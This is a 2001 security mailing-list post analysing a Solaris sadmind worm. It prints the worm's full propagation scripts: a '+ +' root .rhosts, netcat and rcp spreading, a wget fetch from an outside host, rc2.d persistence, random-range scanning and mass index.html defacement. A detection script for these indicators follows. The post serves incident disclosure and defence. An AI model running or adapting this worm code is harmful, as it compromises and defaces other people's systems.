Security Incidents mailing list archives
Re: httpd and sunrpc probes from 'sunos 5.6' machines
From: Martin Markgraf <mm () RIEN-AG DE>
Date: Tue, 8 May 2001 12:36:57 +0200
Hello,

Brad Doctor wrote:

> I've also seen much of the same -- I submitted this to the list over the weekend, but it apparently never made it there. Basically, there is a worm process much like Lion, etc. that after compromising the machine, starts generating IP addresses and going after more. The exploit that is being used is some sort of sadmin exploit. A tell-tale sign is a root shell open on port 600 (not functional however). The exploit places its contents in /dev/cuc and goes to town with a perl script and a random number generator. It also creates a wide-open .rhosts for root. It also starts an inetd process with /tmp/.x that has one service, the root shell bound to it, just like the lion stuff did a la "sh -i", however this shell has no IO capabilities on Solaris, and is thus useless. So, much like the other worms, this one trudges on blindly after cracking a machine that was wide-open to begin with. I think the same group wrote this one as well due to its similarities in execution and methodology. It is executing Unicode attacks, with static HTML in the perl script, typical anti US stuff.
In the last five days or so I have seen about 9 scans for port 111 on a single machine. Scanning back these hosts has shown that 8 of them are running under Solaris 5.6 and have an open port 600. The root shell on the machines I have seen was functional if you connect to them with a program like netcat instead of telnet, since a simple "sh -i" does not set an appropriate environment. The worm itself initially uses port 600 to create a "+ +" .rhosts file in the root home directory of a newly hacked box and then copies itself via rcp as /tmp/uni.tar to that box.

Here is the file list of the /tmp/uni.tar that I have found:

drwxr-xr-x 0/1      0 Apr 29 12:55 2001 /dev/cuc/
-rwxr-xr-x 0/1   6556 Apr 26 08:07 2001 /dev/cuc/brute
-rw-r--r-- 0/1     86 Apr 26 09:13 2001 /dev/cuc/cmd1.txt
-rw-r--r-- 0/1    655 Apr 29 12:17 2001 /dev/cuc/cmd2.txt
-rwxr-xr-x 0/1  11828 Apr 25 15:27 2001 /dev/cuc/grabbb
-rw-r--r-- 0/1    151 Apr 26 09:13 2001 /dev/cuc/ranip.pl
-rwxr-xr-x 0/1   1591 Apr 27 06:38 2001 /dev/cuc/sadmin.sh
-rwxr-xr-x 0/1  14644 Apr 25 15:27 2001 /dev/cuc/sadmindex-sparc
-rwxr-xr-x 0/1    217 Apr 26 09:59 2001 /dev/cuc/start.sh
-rwxr-xr-x 0/1    566 Apr 27 03:45 2001 /dev/cuc/time.sh
-rw-r--r-- 0/1  67798 Apr 26 09:13 2001 /dev/cuc/uniattack.pl
-rwxr-xr-x 0/1    645 Apr 26 09:13 2001 /dev/cuc/uniattack.sh
-rwxr-xr-x 0/1  28620 Apr 26 08:30 2001 /dev/cuc/nc
-rw-r--r-- 0/1    413 Apr 26 11:16 2001 /dev/cuc/index.html
-rwxr-xr-x 0/1 136248 Apr 29 09:20 2001 /dev/cuc/wget

And these are the shell scripts:

cat cmd1.txt
------------
/bin/echo "+ +" > `/bin/grep root /etc/passwd|/bin/awk -F: '{print $6}'`/.rhosts
exit

cat cmd2.txt
------------
/bin/tar -xvf /tmp/uni.tar
/bin/echo "/bin/nohup /dev/cuc/start.sh >/dev/null 2>&1 &" > /etc/rc2.d/tmp1
/bin/cat /etc/rc2.d/S71rpc >> /etc/rc2.d/tmp1
/bin/mv /etc/rc2.d/S71rpc /etc/rc2.d/tmp2
/bin/mv /etc/rc2.d/tmp1 /etc/rc2.d/S71rpc
/bin/chmod 744 /etc/rc2.d/S71rpc
/dev/cuc/wget -c -O /tmp/perl-5.005_03-sol26-sparc-local.gz http://202.96.209.10:80/mirrors/www.sunfreeware.com/sparc/2.6/perl-5.005_03-sol26-sparc-local.gz
/dev/cuc/gzip -d /tmp/perl-5.005_03-sol26-sparc-local.gz
/bin/mkdir /usr/local
/bin/cat /dev/cuc/pkgadd.txt|/usr/sbin/pkgadd -d /tmp/perl-5.005_03-sol26-sparc-local
/bin/rm -f /tmp/uni.tar /tmp/perl-5.005_03-sol26-sparc-local
exit

cat start.sh
------------
#!/bin/sh
if [ ! -d /dev/cub ]; then
  /bin/mkdir /dev/cub
fi
/bin/nohup /dev/cuc/time.sh &
i=1
while [ $i -lt 5 ]
do
  /bin/nohup /dev/cuc/sadmin.sh &
  /bin/nohup /dev/cuc/uniattack.sh &
  i=`/bin/echo "$i+1"|/bin/bc`
done

cat time.sh
-----------
#!/bin/sh
/bin/ps -ef|/bin/grep uniattack.pl > /dev/cub/tmp1
while true
do
  /bin/sleep 300
  /bin/ps -ef|/bin/grep uniattack.pl > /dev/cub/tmp2
  /bin/awk '{print $2}' /dev/cub/tmp1 > /dev/cub/tmp3
  process=`/bin/awk '{print $2}' /dev/cub/tmp2`
  for p in $process;do
    /bin/grep $p /dev/cub/tmp3
    if [ $? = 0 ];then
      /bin/kill -9 $p
    fi
  done
  /bin/cp /dev/cub/tmp2 /dev/cub/tmp1
  i=`/bin/grep hacked /dev/cub/result.txt|/bin/wc -l`
  if [ $i -gt 2000 ];then
    /bin/nohup /bin/find / -name "index.html" -exec /bin/cp /dev/cuc/index.html {} \; &
    /bin/rm -f /dev/cub/result.txt
  fi
done

cat sadmin.sh
-------------
#!/bin/sh
while true
do
  i=`/usr/local/bin/perl /dev/cuc/ranip.pl`
  j=0
  while [ $j -lt 256 ];do
    /dev/cuc/grabbb -t 3 -a $i.$j.1 -b $i.$j.50 111 >> /dev/cub/$i.txt
    /dev/cuc/grabbb -t 3 -a $i.$j.51 -b $i.$j.100 111 >> /dev/cub/$i.txt
    /dev/cuc/grabbb -t 3 -a $i.$j.101 -b $i.$j.150 111 >> /dev/cub/$i.txt
    /dev/cuc/grabbb -t 3 -a $i.$j.151 -b $i.$j.200 111 >> /dev/cub/$i.txt
    /dev/cuc/grabbb -t 3 -a $i.$j.201 -b $i.$j.254 111 >> /dev/cub/$i.txt
    j=`/bin/echo "$j+1"|/bin/bc`
  done
  iplist=`/bin/awk -F: '{print $1}' /dev/cub/$i.txt`
  for ip in $iplist;do
    /bin/rpcinfo -p $ip > /dev/cub/$i.rpc.txt
    /bin/grep 100232 /dev/cub/$i.rpc.txt >/dev/null 2>&1
    if [ $? = 0 ];then
      /dev/cuc/brute 3 $ip >/dev/null 2>&1
      if [ $? = 0 ];then
        /bin/cat /dev/cuc/cmd1.txt|/dev/cuc/nc $ip 600 >/dev/null 2>&1
        /bin/tar -cvf /tmp/uni.tar /dev/cuc
        /bin/rcp /tmp/uni.tar root@$ip:/tmp/uni.tar >/dev/null 2>&1
        if [ $? = 0 ];then
          /bin/cat /dev/cuc/cmd2.txt|/dev/cuc/nc $ip 600 >/dev/null 2>&1
          /bin/rsh -l root $ip /etc/rc2.d/S71rpc >/dev/null 2>&1 &
          /bin/echo $ip >> /dev/cub/sadminhack.txt
          /bin/rm -f /tmp/uni.tar
        fi
      else
        /dev/cuc/brute 4 $ip >/dev/null 2>&1
        if [ $? = 0 ];then
          /bin/cat /dev/cuc/cmd1.txt|/dev/cuc/nc $ip 600 >/dev/null 2>&1
          /bin/tar -cvf /tmp/uni.tar /dev/cuc
          /bin/rcp /tmp/uni.tar root@$ip:/tmp/uni.tar >/dev/null 2>&1
          if [ $? = 0 ];then
            /bin/cat /dev/cuc/cmd2.txt|/dev/cuc/nc $ip 600 >/dev/null 2>&1
            /bin/rsh -l root $ip /etc/rc2.d/S71rpc >/dev/null 2>&1 &
            /bin/echo $ip >> /dev/cub/sadminhack.txt
            /bin/rm -f /tmp/uni.tar
          fi
        fi
      fi
    fi
    /bin/rm -f /dev/cub/$i.rpc.txt
  done
  /bin/rm -f /dev/cub/$i.txt
done

cat uniattack.sh
----------------
#!/bin/sh
while true
do
  i=`/usr/local/bin/perl /dev/cuc/ranip.pl`
  j=0
  while [ $j -lt 256 ];do
    /dev/cuc/grabbb -t 3 -a $i.$j.1 -b $i.$j.50 80 >> /dev/cub/$i.txt
    /dev/cuc/grabbb -t 3 -a $i.$j.51 -b $i.$j.100 80 >> /dev/cub/$i.txt
    /dev/cuc/grabbb -t 3 -a $i.$j.101 -b $i.$j.150 80 >> /dev/cub/$i.txt
    /dev/cuc/grabbb -t 3 -a $i.$j.151 -b $i.$j.200 80 >> /dev/cub/$i.txt
    /dev/cuc/grabbb -t 3 -a $i.$j.201 -b $i.$j.254 80 >> /dev/cub/$i.txt
    j=`/bin/echo "$j+1"|/bin/bc`
  done
  iplist=`/bin/awk -F: '{print $1}' /dev/cub/$i.txt`
  for ip in $iplist;do
    /usr/local/bin/perl /dev/cuc/uniattack.pl $ip:80 >> /dev/cub/result.txt
  done
  rm -f /dev/cub/$i.txt

regards,
Martin

--
Martin Markgraf              Rien Informationssysteme AG
fon: +49 2841 9083061        Eurotec-Ring 15
fax: +49 2841 9083069        D-47445 Moers
http://www.rien-ag.de        mm () rien-ag de
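A host-side check for the artifacts the two posts above describe, as an added example (not part of the original message or of the worm's own files): it looks for the /dev/cuc and /dev/cub staging directories, /tmp/uni.tar, the /tmp/.x inetd file, the "+ +" .rhosts that cmd1.txt writes for root, the start.sh hook that cmd2.txt prepends to /etc/rc2.d/S71rpc (and the displaced original left as /etc/rc2.d/tmp2), and a TCP listener on port 600 in netstat output. The ROOT prefix argument and the script name check_sadmind_worm.sh are assumptions added so the same functions can be run against a mounted image or a test fixture instead of the live root.

```shell
#!/bin/sh
# Added example, not from the original post or the worm: check a host or a
# mounted image for the indicators described in this thread. All paths come
# from the thread; the ROOT prefix argument is an assumption so the checks
# can be pointed at something other than "/".

# check_worm_indicators ROOT: print one "indicator: ..." line per finding.
# Returns 0 if the tree looks clean, 1 if anything was found.
check_worm_indicators() {
    root="${1:-}"
    found=0

    # 1. Staging directories, the transfer tarball and the inetd backdoor config.
    for f in /dev/cuc /dev/cub /tmp/uni.tar /tmp/.x; do
        if [ -e "$root$f" ]; then
            echo "indicator: $f present"
            found=1
        fi
    done

    # 2. Trust-everyone .rhosts in root's home (what cmd1.txt writes).
    #    Root's home is read from passwd like cmd1.txt does, but matched on
    #    the user name field rather than on any line containing "root".
    home=$(awk -F: '$1 == "root" { print $6 }' "$root/etc/passwd" 2>/dev/null)
    if [ -n "$home" ] && grep -q '^+[[:space:]]*+' "$root$home/.rhosts" 2>/dev/null; then
        echo "indicator: root .rhosts grants access to any host/user ($home/.rhosts)"
        found=1
    fi

    # 3. Persistence: cmd2.txt prepends a nohup of /dev/cuc/start.sh to S71rpc
    #    and leaves the original script behind as /etc/rc2.d/tmp2.
    if grep -q '/dev/cuc/start.sh' "$root/etc/rc2.d/S71rpc" 2>/dev/null; then
        echo "indicator: /etc/rc2.d/S71rpc launches /dev/cuc/start.sh at boot"
        found=1
    fi
    if [ -e "$root/etc/rc2.d/tmp2" ]; then
        echo "indicator: /etc/rc2.d/tmp2 present (displaced original S71rpc)"
        found=1
    fi

    return $found
}

# port600_listener: read "netstat -an" output on stdin and succeed if a TCP
# listener on port 600 is present. Matches Solaris ("*.600") and
# Linux-style ("0.0.0.0:600") address formatting; ":6000" does not match.
port600_listener() {
    grep -E '[.:]600[[:space:]].*LISTEN' >/dev/null
}

# Usage: sh check_sadmind_worm.sh /            (live host, includes netstat)
#        sh check_sadmind_worm.sh /mnt/image   (mounted image, files only)
if [ $# -gt 0 ]; then
    check_worm_indicators "$1" || :
    if [ "$1" = "/" ] && netstat -an 2>/dev/null | port600_listener; then
        echo "indicator: TCP listener on port 600"
    fi
fi
```

The file checks are deliberately read-only, so the script can be run from a rescue environment against a mounted disk before anything on the box is trusted; the "+ +" match and the S71rpc grep are the two findings that most reliably distinguish this worm from an unrelated port 111 or port 600 service.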